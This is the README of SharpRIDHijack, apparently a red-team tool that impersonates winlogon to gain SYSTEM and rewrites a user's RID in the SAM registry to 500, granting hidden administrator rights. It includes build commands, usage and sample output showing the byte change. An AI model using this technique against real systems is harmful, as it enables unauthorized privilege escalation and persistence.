README.md


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123

# SharpRIDHijack

`SharpRIDHijack` is an offensive security tool designed for performing RID (Relative Identifier) hijacking on Windows systems. It escalates privileges by impersonating the SYSTEM account and modifying the SAM registry to assign an administrative RID to a specified user account. 

> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.

## Features

- **Privilege Escalation**: Escalates to SYSTEM by impersonating the winlogon process token.
- **RID Hijacking**: Modifies the SAM registry to assign an administrative RID (default: 500) to a target user.

## Installation

### Prerequisites

- **.NET Framework**: Version 4.7.2 or later.
- **Visual Studio or MSBuild**: For compiling the C# source code.
- **Git**: To clone the repository.
- **Windows**: Compatible with Windows 10/11 (other versions may require offset adjustments for SAM registry).

### Steps

- Clone the repository:

```
PS C:\> git clone https://github.com/heqnx/SharpRIDHijack.git
PS C:\> cd SharpRIDHijack
```

- Compile the source code with Visual Studio by opening `SharpRIDHijack.sln`

- Alternatively, compile with MSBuild:

```
PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpRIDHijack.csproj
```

## Usage

### Command-Line Flags

- Run SharpRIDHijack.exe with a target username to perform RID hijacking. The tool requires administrative privileges.

```
PS C:\> Usage: SharpRIDHijack.exe <username>
```

## Examples

### Perform RID Hijacking via Command-Line

- Hijack the RID of the `lowpriv` user to grant administrative privileges:

```
PS C:\> SharpRIDHijack.exe lowpriv
[inf] SeDebugPrivilege enabled
[inf] Successfully impersonated WinLogon, running as NT AUTHORITY\SYSTEM
[inf] Original RID: 000003EB (1003)
[inf] Original F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
[inf] Found RID 1003 at offset 48
[inf] New F value:
03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
```

- Note the user is explicitly in the administrators group when checking with `net user`:

```
PS C:\> net user lowpriv
User name                    lowpriv

...

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
```

- User does show up with an administrator RID and associated privileges:

```
PS C:\> whoami /user

USER INFORMATION
----------------

User Name               SID
======================= ============================================
DESKTOP-C9VFZ4T\lowpriv S-1-5-21-1743776718-435079111-2757990620-500

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
...
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
...
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
...
```


## Automated Releases

Check the GitHub Releases page for the new release with attached binaries.

## License

This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.

## Disclaimer

`SharpRIDHijack` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.